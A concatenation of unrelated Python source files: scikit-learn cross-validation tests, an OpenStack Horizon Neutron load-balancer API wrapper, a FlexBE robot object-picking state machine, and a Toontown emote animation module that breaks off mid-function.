exploit_incremental_learning=False)
assert_array_equal(train_sizes_inc, train_sizes_batch)
assert_array_almost_equal(train_scores_inc.mean(axis=1),
train_scores_batch.mean(axis=1))
assert_array_almost_equal(test_scores_inc.mean(axis=1),
test_scores_batch.mean(axis=1))
def test_learning_curve_n_sample_range_out_of_bounds():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.0, 1.0])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.1, 1.1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 20])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[1, 21])
def test_learning_curve_remove_duplicate_sample_sizes():
X, y = make_classification(n_samples=3, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(2)
train_sizes, _, _ = assert_warns(
RuntimeWarning, learning_curve, estimator, X, y, cv=3,
train_sizes=np.linspace(0.33, 1.0, 3))
assert_array_equal(train_sizes, [1, 2])
def test_learning_curve_with_boolean_indices():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
cv = KFold(n_splits=3)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_validation_curve():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
param_range = np.linspace(0, 1, 10)
with warnings.catch_warnings(record=True) as w:
train_scores, test_scores = validation_curve(
MockEstimatorWithParameter(), X, y, param_name="param",
param_range=param_range, cv=2
)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_array_almost_equal(train_scores.mean(axis=1), param_range)
assert_array_almost_equal(test_scores.mean(axis=1), 1 - param_range)
def test_check_is_permutation():
p = np.arange(100)
assert_true(_check_is_permutation(p, 100))
assert_false(_check_is_permutation(np.delete(p, 23), 100))
p[0] = 23
assert_false(_check_is_permutation(p, 100))
def test_cross_val_predict_sparse_prediction():
# check that cross_val_predict gives same result for sparse and dense input
X, y = make_multilabel_classification(n_classes=2, n_labels=1,
allow_unlabeled=False,
return_indicator=True,
random_state=1)
X_sparse = csr_matrix(X)
y_sparse = csr_matrix(y)
classif = OneVsRestClassifier(SVC(kernel='linear'))
preds = cross_val_predict(classif, X, y, cv=10)
preds_sparse = cross_val_predict(classif, X_sparse, y_sparse, cv=10)
preds_sparse = preds_sparse.toarray()
assert_array_almost_equal(preds_sparse, preds)
def test_cross_val_predict_with_method():
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=0)
classes = len(set(y))
kfold = KFold(len(iris.target))
methods = ['decision_function', 'predict_proba', 'predict_log_proba']
for method in methods:
est = LogisticRegression()
predictions = cross_val_predict(est, X, y, method=method)
assert_equal(len(predictions), len(y))
expected_predictions = np.zeros([len(y), classes])
func = getattr(est, method)
# Naive loop (should be same as cross_val_predict):
for train, test in kfold.split(X, y):
est.fit(X[train], y[train])
expected_predictions[test] = func(X[test])
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold)
assert_array_almost_equal(expected_predictions, predictions)
def test_score_memmap():
# Ensure a scalar score of memmap type is accepted
iris = load_iris()
X, y = iris.data, iris.target
clf = MockClassifier()
tf = tempfile.NamedTemporaryFile(mode='wb', delete=False)
tf.write(b'Hello world!!!!!')
tf.close()
scores = np.memmap(tf.name, dtype=np.float64)
score = np.memmap(tf.name, shape=(), mode='r', dtype=np.float64)
try:
cross_val_score(clf, X, y, scoring=lambda est, X, y: score)
# non-scalar should still fail
assert_raises(ValueError, cross_val_score, clf, X, y,
scoring=lambda est, X, y: scores)
finally:
# Best effort to release the mmap file handles before deleting the
# backing file under Windows
scores, score = None, None
for _ in range(3):
try:
os.unlink(tf.name)
break
except WindowsError:
sleep(1.)
|
|
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from django.utils.datastructures import SortedDict
from django.utils.translation import ugettext_lazy as _
from horizon import messages
from openstack_dashboard.api import neutron
neutronclient = neutron.neutronclient
class Vip(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer vip."""
def __init__(self, apiresource):
super(Vip, self).__init__(apiresource)
class Pool(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer pool."""
def __init__(self, apiresource):
if 'provider' not in apiresource:
apiresource['provider'] = None
super(Pool, self).__init__(apiresource)
class Member(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer member."""
def __init__(self, apiresource):
super(Member, self).__init__(apiresource)
class PoolStats(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer pool stats."""
def __init__(self, apiresource):
super(PoolStats, self).__init__(apiresource)
class PoolMonitor(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer pool health monitor."""
def __init__(self, apiresource):
super(PoolMonitor, self).__init__(apiresource)
def vip_create(request, **kwargs):
"""Create a vip for a specified pool.
:param request: request context
:param address: virtual IP address
:param name: name for vip
:param description: description for vip
:param subnet_id: subnet_id for subnet of vip
:param protocol_port: transport layer port number for vip
:param protocol: protocol for vip (e.g. HTTP)
:param pool_id: ID of the pool the vip fronts
:param session_persistence: session persistence settings for vip
:param connection_limit: maximum number of connections (optional)
:param admin_state_up: admin state
:returns: Vip object
"""
body = {'vip': {'name': kwargs['name'],
'description': kwargs['description'],
'subnet_id': kwargs['subnet_id'],
'protocol_port': kwargs['protocol_port'],
'protocol': kwargs['protocol'],
'pool_id': kwargs['pool_id'],
'session_persistence': kwargs['session_persistence'],
'admin_state_up': kwargs['admin_state_up']
}}
if kwargs.get('connection_limit'):
body['vip']['connection_limit'] = kwargs['connection_limit']
if kwargs.get('address'):
body['vip']['address'] = kwargs['address']
vip = neutronclient(request).create_vip(body).get('vip')
return Vip(vip)
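# Illustrative call to vip_create above (a sketch only, not executed; the
# subnet/pool IDs and the session_persistence value are placeholders, not
# values mandated by the API):
#
#     vip = vip_create(request,
#                      name='web-vip',
#                      description='VIP for the web pool',
#                      subnet_id=subnet_id,
#                      protocol_port=80,
#                      protocol='HTTP',
#                      pool_id=pool_id,
#                      session_persistence={'type': 'HTTP_COOKIE'},
#                      admin_state_up=True,
#                      connection_limit=100)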
def vip_list(request, **kwargs):
vips = neutronclient(request).list_vips(**kwargs).get('vips')
return [Vip(v) for v in vips]
def vip_get(request, vip_id):
return _vip_get(request, vip_id, expand_resource=True)
def _vip_get(request, vip_id, expand_resource=False):
vip = neutronclient(request).show_vip(vip_id).get('vip')
if expand_resource:
vip['subnet'] = neutron.subnet_get(request, vip['subnet_id'])
vip['port'] = neutron.port_get(request, vip['port_id'])
vip['pool'] = _pool_get(request, vip['pool_id'])
return Vip(vip)
def vip_update(request, vip_id, **kwargs):
vip = neutronclient(request).update_vip(vip_id, kwargs).get('vip')
return Vip(vip)
def vip_delete(request, vip_id):
neutronclient(request).delete_vip(vip_id)
def pool_create(request, **kwargs):
"""Create a pool for specified protocol
:param request: request context
:param name: name for pool
:param description: description for pool
:param subnet_id: subnet_id for subnet of pool
:param protocol: load balanced protocol
:param lb_method: load balancer method
:param provider: name of the provider/driver for the pool
:param admin_state_up: admin state (default on)
"""
body = {'pool': {'name': kwargs['name'],
'description': kwargs['description'],
'subnet_id': kwargs['subnet_id'],
'protocol': kwargs['protocol'],
'lb_method': kwargs['lb_method'],
'admin_state_up': kwargs['admin_state_up'],
'provider': kwargs['provider'],
}}
pool = neutronclient(request).create_pool(body).get('pool')
return Pool(pool)
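# Illustrative call to pool_create above (a sketch only, not executed; the
# subnet ID and provider name are placeholders):
#
#     pool = pool_create(request,
#                        name='web-pool',
#                        description='pool for the web tier',
#                        subnet_id=subnet_id,
#                        protocol='HTTP',
#                        lb_method='ROUND_ROBIN',
#                        admin_state_up=True,
#                        provider='haproxy')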
def _get_vip(request, pool, vip_dict, expand_name_only=False):
if pool['vip_id'] is not None:
try:
if vip_dict:
vip = vip_dict.get(pool['vip_id'])
else:
vip = _vip_get(request, pool['vip_id'])
except Exception:
messages.warning(request, _("Unable to get VIP for pool "
"%(pool)s.") % {"pool": pool["id"]})
vip = Vip({'id': pool['vip_id'], 'name': ''})
if expand_name_only:
vip = vip.name_or_id
return vip
else:
return None
def pool_list(request, **kwargs):
return _pool_list(request, expand_subnet=True, expand_vip=True, **kwargs)
def _pool_list(request, expand_subnet=False, expand_vip=False, **kwargs):
pools = neutronclient(request).list_pools(**kwargs).get('pools')
if expand_subnet:
subnets = neutron.subnet_list(request)
subnet_dict = SortedDict((s.id, s) for s in subnets)
for p in pools:
subnet = subnet_dict.get(p['subnet_id'])
p['subnet_name'] = subnet.cidr if subnet else None
if expand_vip:
vips = vip_list(request)
vip_dict = SortedDict((v.id, v) for v in vips)
for p in pools:
p['vip_name'] = _get_vip(request, p, vip_dict,
expand_name_only=True)
return [Pool(p) for p in pools]
def pool_get(request, pool_id):
return _pool_get(request, pool_id, expand_resource=True)
def _pool_get(request, pool_id, expand_resource=False):
try:
pool = neutronclient(request).show_pool(pool_id).get('pool')
except Exception:
messages.warning(request, _("Unable to get pool detail."))
return None
if expand_resource:
# TODO(lyj): The expanded resources (subnet, members, etc.) attached to
# a pool can be deleted without cleaning up the pool's related database
# entries, which causes exceptions when we try to fetch those deleted
# resources. Handle this by showing a warning message here. The
# try/except blocks can be safely removed once the neutron bug is fixed:
# https://bugs.launchpad.net/neutron/+bug/1406854
try:
pool['subnet'] = neutron.subnet_get(request, pool['subnet_id'])
except Exception:
messages.warning(request, _("Unable to get subnet for pool "
"%(pool)s.") % {"pool": pool_id})
pool['vip'] = _get_vip(request, pool, vip_dict=None,
expand_name_only=False)
try:
pool['members'] = _member_list(request, expand_pool=False,
pool_id=pool_id)
except Exception:
messages.warning(request, _("Unable to get members for pool "
"%(pool)s.") % {"pool": pool_id})
monitors = []
for monitor_id in pool['health_monitors']:
try:
monitors.append(_pool_health_monitor_get(request, monitor_id,
False))
except Exception:
messages.warning(request,
_("Unable to get health monitor "
"%(monitor_id)s for pool %(pool)s.")
% {"pool": pool_id,
"monitor_id": monitor_id})
pool['health_monitors'] = monitors
return Pool(pool)
def pool_update(request, pool_id, **kwargs):
pool = neutronclient(request).update_pool(pool_id, kwargs).get('pool')
return Pool(pool)
def pool_delete(request, pool):
neutronclient(request).delete_pool(pool)
# not linked to UI yet
def pool_stats(request, pool_id, **kwargs):
stats = neutronclient(request).retrieve_pool_stats(pool_id, **kwargs)
return PoolStats(stats)
def pool_health_monitor_create(request, **kwargs):
"""Create a health monitor
:param request: request context
:param type: type of monitor
:param delay: delay of monitor
:param timeout: timeout of monitor
:param max_retries: max retries [1..10]
:param http_method: HTTP method (HTTP/HTTPS monitors only)
:param url_path: URL path (HTTP/HTTPS monitors only)
:param expected_codes: expected HTTP status codes (HTTP/HTTPS monitors only)
:param admin_state_up: admin state
"""
monitor_type = kwargs['type'].upper()
body = {'health_monitor': {'type': monitor_type,
'delay': kwargs['delay'],
'timeout': kwargs['timeout'],
'max_retries': kwargs['max_retries'],
'admin_state_up': kwargs['admin_state_up']
}}
if monitor_type in ['HTTP', 'HTTPS']:
body['health_monitor']['http_method'] = kwargs['http_method']
body['health_monitor']['url_path'] = kwargs['url_path']
body['health_monitor']['expected_codes'] = kwargs['expected_codes']
mon = neutronclient(request).create_health_monitor(body).get(
'health_monitor')
return PoolMonitor(mon)
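# Illustrative call to pool_health_monitor_create above (a sketch only, not
# executed). As the body construction above shows, the http_method, url_path
# and expected_codes keywords are consumed only when the monitor type is
# HTTP or HTTPS:
#
#     monitor = pool_health_monitor_create(request,
#                                          type='http',
#                                          delay=10,
#                                          timeout=5,
#                                          max_retries=3,
#                                          http_method='GET',
#                                          url_path='/healthcheck',
#                                          expected_codes='200',
#                                          admin_state_up=True)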
def pool_health_monitor_list(request, **kwargs):
monitors = neutronclient(request).list_health_monitors(
**kwargs).get('health_monitors')
return [PoolMonitor(m) for m in monitors]
def pool_health_monitor_get(request, monitor_id):
return _pool_health_monitor_get(request, monitor_id, expand_resource=True)
def _pool_health_monitor_get(request, monitor_id, expand_resource=False):
monitor = neutronclient(request
).show_health_monitor(monitor_id
).get('health_monitor')
if expand_resource:
pool_ids = [p['pool_id'] for p in monitor['pools']]
monitor['pools'] = _pool_list(request, id=pool_ids)
return PoolMonitor(monitor)
def pool_health_monitor_update(request, monitor_id, **kwargs):
monitor = neutronclient(request
).update_health_monitor(monitor_id, kwargs
).get('health_monitor')
return PoolMonitor(monitor)
def pool_health_monitor_delete(request, mon_id):
neutronclient(request).delete_health_monitor(mon_id)
def member_create(request, **kwargs):
"""Create a load balance member
:param request: request context
:param pool_id: pool_id of pool for member
:param address: IP address
:param protocol_port: transport layer port number
:param weight: weight for member
:param admin_state_up: admin state
"""
body = {'member': {'pool_id': kwargs['pool_id'],
'address': kwargs['address'],
'protocol_port': kwargs['protocol_port'],
'admin_state_up': kwargs['admin_state_up']
}}
if kwargs.get('weight'):
body['member']['weight'] = kwargs['weight']
member = neutronclient(request).create_member(body).get('member')
return Member(member)
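# Illustrative call to member_create above (a sketch only, not executed;
# the pool ID and address are placeholders):
#
#     member = member_create(request,
#                            pool_id=pool_id,
#                            address='10.0.0.5',
#                            protocol_port=8080,
#                            weight=1,
#                            admin_state_up=True)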
def member_list(request, **kwargs):
return _member_list(request, expand_pool=True, **kwargs)
def _member_list(request, expand_pool, **kwargs):
members = neutronclient(request).list_members(**kwargs).get('members')
if expand_pool:
pools = _pool_list(request)
pool_dict = SortedDict((p.id, p) for p in pools)
for m in members:
m['pool_name'] = pool_dict.get(m['pool_id']).name_or_id
return [Member(m) for m in members]
def member_get(request, member_id):
return _member_get(request, member_id, expand_pool=True)
def _member_get(request, member_id, expand_pool):
member = neutronclient(request).show_member(member_id).get('member')
if expand_pool:
member['pool'] = _pool_get(request, member['pool_id'])
return Member(member)
def member_update(request, member_id, **kwargs):
member = neutronclient(request).update_member(member_id, kwargs
).get('member')
return Member(member)
def member_delete(request, mem_id):
neutronclient(request).delete_member(mem_id)
def pool_monitor_association_create(request, **kwargs):
"""Associate a health monitor with pool
:param request: request context
:param monitor_id: id of monitor
:param pool_id: id of pool
"""
body = {'health_monitor': {'id': kwargs['monitor_id'], }}
neutronclient(request).associate_health_monitor(
kwargs['pool_id'], body)
def pool_monitor_association_delete(request, **kwargs):
"""Disassociate a health monitor from pool
:param request: request context
:param monitor_id: id of monitor
:param pool_id: id of pool
"""
neutronclient(request).disassociate_health_monitor(
kwargs['pool_id'], kwargs['monitor_id'])
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.GetRosParam import GetRosParam
from flexbe_states.check_condition_state import CheckConditionState
from sara_flexbe_states.sara_say import SaraSay
from sara_flexbe_behaviors.action_pick_sm import Action_pickSM
from sara_flexbe_states.SetKey import SetKey
from sara_flexbe_states.get_reachable_waypoint import Get_Reacheable_Waypoint
from flexbe_states.calculation_state import CalculationState
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.moveit_move import MoveitMove
from sara_flexbe_states.sara_move_base import SaraMoveBase
from flexbe_states.wait_state import WaitState
from sara_flexbe_states.for_loop import ForLoop
from sara_flexbe_states.SetRosParam import SetRosParam
from sara_flexbe_behaviors.action_find_sm import Action_findSM
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Tue Jul 11 2017
@author: Philippe La Madeleine
'''
class ActionWrapper_PickSM(Behavior):
'''
Action wrapper for Pick
'''
def __init__(self):
super(ActionWrapper_PickSM, self).__init__()
self.name = 'ActionWrapper_Pick'
# parameters of this behavior
# references to used behaviors
self.add_behavior(Action_pickSM, 'Action_pick')
self.add_behavior(Action_findSM, 'Action_find')
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
# O 797 34
# Pick|n1- object
def create(self):
# x:660 y:509, x:880 y:203, x:715 y:440
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed', 'critical_fail'], input_keys=['Action'])
_state_machine.userdata.Action = ["Pick","bottle"]
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
# x:30 y:365, x:130 y:365, x:230 y:365, x:330 y:365
_sm_group_0 = ConcurrencyContainer(outcomes=['done'], input_keys=['pose_out'], conditions=[
('done', [('move', 'arrived')]),
('done', [('move', 'failed')]),
('done', [('3', 'done')])
])
with _sm_group_0:
# x:30 y:40
OperatableStateMachine.add('move',
SaraMoveBase(reference="map"),
transitions={'arrived': 'done', 'failed': 'done'},
autonomy={'arrived': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'pose': 'pose_out'})
# x:179 y:91
OperatableStateMachine.add('3',
WaitState(wait_time=2),
transitions={'done': 'done'},
autonomy={'done': Autonomy.Off})
# x:40 y:700
_sm_get_closer_1 = OperatableStateMachine(outcomes=['done'], input_keys=['Object'])
with _sm_get_closer_1:
# x:59 y:36
OperatableStateMachine.add('set targetpose',
SetKey(Value="PreGripPose"),
transitions={'done': 'say closer'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'target'})
# x:88 y:374
OperatableStateMachine.add('set dist',
SetKey(Value=0.8),
transitions={'done': 'get close pos'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'distance'})
# x:26 y:448
OperatableStateMachine.add('get close pos',
Get_Reacheable_Waypoint(),
transitions={'done': 'Group'},
autonomy={'done': Autonomy.Off},
remapping={'pose_in': 'Pos', 'distance': 'distance', 'pose_out': 'pose_out'})
# x:47 y:213
OperatableStateMachine.add('get pos',
CalculationState(calculation=lambda x: x.position),
transitions={'done': 'move head'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'Object', 'output_value': 'Pos'})
# x:88 y:290
OperatableStateMachine.add('move head',
SaraSetHeadAngle(pitch=0.7, yaw=0),
transitions={'done': 'set dist'},
autonomy={'done': Autonomy.Off})
# x:201 y:156
OperatableStateMachine.add('move arm',
MoveitMove(move=True, waitForExecution=True, group="RightArm", watchdog=15),
transitions={'done': 'get pos', 'failed': 'get pos'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'target': 'target'})
# x:60 y:106
OperatableStateMachine.add('say closer',
SaraSay(sentence="I need to get a bit closer.", input_keys=[], emotion=1, block=False),
transitions={'done': 'move arm'},
autonomy={'done': Autonomy.Off})
# x:26 y:541
OperatableStateMachine.add('Group',
_sm_group_0,
transitions={'done': 'wait'},
autonomy={'done': Autonomy.Inherit},
remapping={'pose_out': 'pose_out'})
# x:33 y:625
OperatableStateMachine.add('wait',
WaitState(wait_time=2),
transitions={'done': 'done'},
autonomy={'done': Autonomy.Off})
# x:59 y:308, x:447 y:59, x:384 y:162
_sm_check_form_2 = OperatableStateMachine(outcomes=['done', 'fail_full', 'full_no_object'], input_keys=['Action'])
with _sm_check_form_2:
# x:31 y:40
OperatableStateMachine.add('check if gripper full',
GetRosParam(ParamName="behavior/Gripper_Content"),
transitions={'done': 'Say_Full', 'failed': 'cond'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'Value': 'ObjectInGripper'})
# x:30 y:121
OperatableStateMachine.add('cond',
CheckConditionState(predicate=lambda x: x[1] == ''),
transitions={'true': 'not told', 'false': 'done'},
autonomy={'true': Autonomy.Off, 'false': Autonomy.Off},
remapping={'input_value': 'Action'})
# x:222 y:119
OperatableStateMachine.add('not told',
SaraSay(sentence="Hum! They didn't told me what to pick", input_keys=[], emotion=1, block=True),
transitions={'done': 'full_no_object'},
autonomy={'done': Autonomy.Off})
# x:242 y:31
OperatableStateMachine.add('Say_Full',
SaraSay(sentence=lambda x: "Wait. There is already a "+ x + "in my gripper.", input_keys=[], emotion=0, block=True),
transitions={'done': 'fail_full'},
autonomy={'done': Autonomy.Off})
with _state_machine:
# x:84 y:30
OperatableStateMachine.add('Check Form',
_sm_check_form_2,
transitions={'done': 'get name', 'fail_full': 'cause1', 'full_no_object': 'cause2'},
autonomy={'done': Autonomy.Inherit, 'fail_full': Autonomy.Inherit, 'full_no_object': Autonomy.Inherit},
remapping={'Action': 'Action'})
# x:28 y:452
OperatableStateMachine.add('Action_pick',
self.use_behavior(Action_pickSM, 'Action_pick'),
transitions={'success': 'Got_It', 'unreachable': 'for 1', 'not found': 'Say_lost', 'dropped': 'say missed'},
autonomy={'success': Autonomy.Inherit, 'unreachable': Autonomy.Inherit, 'not found': Autonomy.Inherit, 'dropped': Autonomy.Inherit},
remapping={'objectID': 'ID'})
# x:261 y:239
OperatableStateMachine.add('Get closer',
_sm_get_closer_1,
transitions={'done': 'Action_find'},
autonomy={'done': Autonomy.Inherit},
remapping={'Object': 'Object'})
# x:275 y:333
OperatableStateMachine.add('for 1',
ForLoop(repeat=1),
transitions={'do': 'Get closer', 'end': 'say giveup'},
autonomy={'do': Autonomy.Off, 'end': Autonomy.Off},
remapping={'index': 'index'})
# x:416 y:264
OperatableStateMachine.add('say giveup',
SaraSay(sentence="I give up", input_keys=[], emotion=1, block=True),
transitions={'done': 'cause4'},
autonomy={'done': Autonomy.Off})
# x:284 y:496
OperatableStateMachine.add('say missed',
SaraSay(sentence="Oops! I missed.", input_keys=[], emotion=1, block=True),
transitions={'done': 'cause4'},
autonomy={'done': Autonomy.Off})
# x:469 y:495
OperatableStateMachine.add('set param',
SetRosParam(ParamName="behavior/GripperContent"),
transitions={'done': 'finished'},
autonomy={'done': Autonomy.Off},
remapping={'Value': 'ObjectName'})
# x:82 y:115
OperatableStateMachine.add('get name',
CalculationState(calculation=lambda x: x[1]),
transitions={'done': 'Action_find'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'Action', 'output_value': 'ObjectName'})
# x:511 y:20
OperatableStateMachine.add('cause1',
SetKey(Value="My gripper was already full."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:512 y:81
OperatableStateMachine.add('cause2',
SetKey(Value="I didn't know what to pick."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:511 y:143
OperatableStateMachine.add('cause3',
SetKey(Value="I didn't found the object."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:690 y:197
OperatableStateMachine.add('setrosparam',
SetRosParam(ParamName="behavior/GPSR/CauseOfFailure"),
transitions={'done': 'failed'},
autonomy={'done': Autonomy.Off},
remapping={'Value': 'Key'})
# x:605 y:312
OperatableStateMachine.add('cause4',
SetKey(Value="I was unable to pick the object."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:30 y:188
OperatableStateMachine.add('Action_find',
self.use_behavior(Action_findSM, 'Action_find'),
transitions={'done': 'getID', 'failed': 'cause3'},
autonomy={'done': Autonomy.Inherit, 'failed': Autonomy.Inherit},
remapping={'className': 'ObjectName', 'entity': 'Object'})
# x:49 y:322
OperatableStateMachine.add('getID',
CalculationState(calculation=lambda x: x.ID),
transitions={'done': 'Action_pick'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'Object', 'output_value': 'ID'})
# x:284 y:422
OperatableStateMachine.add('Say_lost',
SaraSay(sentence=lambda x: "Hum! I lost sight of the "+x, input_keys=[], emotion=0, block=True),
transitions={'done': 'cause4'},
autonomy={'done': Autonomy.Off})
# x:281 y:572
OperatableStateMachine.add('Got_It',
SaraSay(sentence=lambda x: "I have the "+x, input_keys=[], emotion=0, block=True),
transitions={'done': 'set param'},
autonomy={'done': Autonomy.Off})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
|
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import *
from direct.showbase import PythonUtil
from pandac.PandaModules import *
import random
import types
import Toon, ToonDNA
from otp.avatar import Emote
from otp.otpbase import OTPLocalizer
from toontown.chat.ChatGlobals import *
from toontown.nametag.NametagGlobals import *
from toontown.toonbase import TTLocalizer
EmoteSleepIndex = 4
EmoteClear = -1
def doVictory(toon, volume = 1):
duration = toon.getDuration('victory', 'legs')
sfx = base.loadSfx('phase_3.5/audio/sfx/ENC_Win.ogg')
sfxDuration = duration - 1.0
sfxTrack = SoundInterval(sfx, loop=1, duration=sfxDuration, node=toon, volume=volume)
track = Sequence(Func(toon.play, 'victory'), sfxTrack, duration=0)
return (track, duration, None)
def doJump(toon, volume = 1):
track = Sequence(Func(toon.play, 'jump'))
return (track, 0, None)
def doDead(toon, volume = 1):
toon.animFSM.request('Sad')
return (None, 0, None)
def doAnnoyed(toon, volume = 1):
duration = toon.getDuration('angry', 'torso')
sfx = None
if toon.style.getAnimal() == 'bear':
sfx = base.loadSfx('phase_3.5/audio/dial/AV_bear_exclaim.ogg')
else:
sfx = base.loadSfx('phase_3.5/audio/sfx/avatar_emotion_angry.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
track = Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), Func(toon.play, 'angry'), Func(playSfx))
exitTrack = Sequence(Func(toon.normalEyes), Func(toon.blinkEyes))
return (track, duration, exitTrack)
def doAngryEyes(toon, volume = 1):
track = Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), Wait(10.0), Func(toon.normalEyes))
return (track, 0.1, None)
def doHappy(toon, volume = 1):
track = Sequence(Func(toon.play, 'jump'), Func(toon.normalEyes), Func(toon.blinkEyes))
duration = toon.getDuration('jump', 'legs')
return (track, duration, None)
def doSad(toon, volume = 1):
track = Sequence(Func(toon.sadEyes), Func(toon.blinkEyes))
exitTrack = Sequence(Func(toon.normalEyes), Func(toon.blinkEyes))
return (track, 3, exitTrack)
def doSleep(toon, volume = 1):
duration = 4
track = Sequence(Func(toon.stopLookAround), Func(toon.stopBlink), Func(toon.closeEyes), Func(toon.lerpLookAt, Point3(0, 1, -4)), Func(toon.loop, 'neutral'), Func(toon.setPlayRate, 0.4, 'neutral'), Func(toon.setChatAbsolute, TTLocalizer.ToonSleepString, CFThought))
def wakeUpFromSleepEmote():
toon.startLookAround()
toon.openEyes()
toon.startBlink()
toon.setPlayRate(1, 'neutral')
if toon.nametag.getChatText() == TTLocalizer.ToonSleepString:
toon.clearChat()
toon.lerpLookAt(Point3(0, 1, 0), time=0.25)
exitTrack = Sequence(Func(wakeUpFromSleepEmote))
return (track, duration, exitTrack)
def doYes(toon, volume = 1):
tracks = Parallel(autoFinish=1)
for lod in toon.getLODNames():
h = toon.getPart('head', lod)
tracks.append(Sequence(LerpHprInterval(h, 0.1, Vec3(0, -30, 0)), LerpHprInterval(h, 0.15, Vec3(0, 20, 0)), LerpHprInterval(h, 0.15, Vec3(0, -20, 0)), LerpHprInterval(h, 0.15, Vec3(0, 20, 0)), LerpHprInterval(h, 0.15, Vec3(0, -20, 0)), LerpHprInterval(h, 0.15, Vec3(0, 20, 0)), LerpHprInterval(h, 0.1, Vec3(0, 0, 0))))
tracks.start()
return (None, 0, None)
def doNo(toon, volume = 1):
tracks = Parallel(autoFinish=1)
for lod in toon.getLODNames():
h = toon.getPart('head', lod)
tracks.append(Sequence(LerpHprInterval(h, 0.1, Vec3(40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(-40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(-40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(20, 0, 0)), LerpHprInterval(h, 0.15, Vec3(-20, 0, 0)), LerpHprInterval(h, 0.1, Vec3(0, 0, 0))))
tracks.start()
return (None, 0, None)
def doOk(toon, volume = 1):
return (None, 0, None)
def doShrug(toon, volume = 1):
sfx = base.loadSfx('phase_3.5/audio/sfx/avatar_emotion_shrug.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
track = Sequence(Func(toon.play, 'shrug'), Func(playSfx))
duration = toon.getDuration('shrug', 'torso')
return (track, duration, None)
def doWave(toon, volume = 1):
track = Sequence(Func(toon.play, 'wave'))
duration = toon.getDuration('wave', 'torso')
return (track, duration, None)
def doApplause(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_applause.ogg')
def playSfx():
base.playSfx(sfx, volume=1, node=toon)
track = Sequence(Func(toon.play, 'applause'), Func(playSfx))
duration = toon.getDuration('applause', 'torso')
return (track, duration, None)
def doConfused(toon, volume = 1):
